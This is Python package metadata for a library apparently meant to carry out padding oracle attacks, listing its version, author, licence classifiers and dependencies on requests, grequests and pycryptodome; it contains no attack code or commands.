Metadata-Version: 2.1
Name: padding-oracle-attack
Version: 0.1.0
Summary: a library for padding oracle attack
Home-page: https://github.com/lcark/padding_oracle_attack/
Author: lcark
Author-email: lcark@foxmail.com
License: UNKNOWN
Platform: UNKNOWN
Classifier: Programming Language :: Python :: 3
Classifier: License :: OSI Approved :: MIT License
Classifier: Operating System :: OS Independent
Requires-Python: >=3.3
Requires-Dist: requests (>=2.21.0)
Requires-Dist: grequests (>=0.6.0)
Requires-Dist: pycryptodome (>=3.9.7)
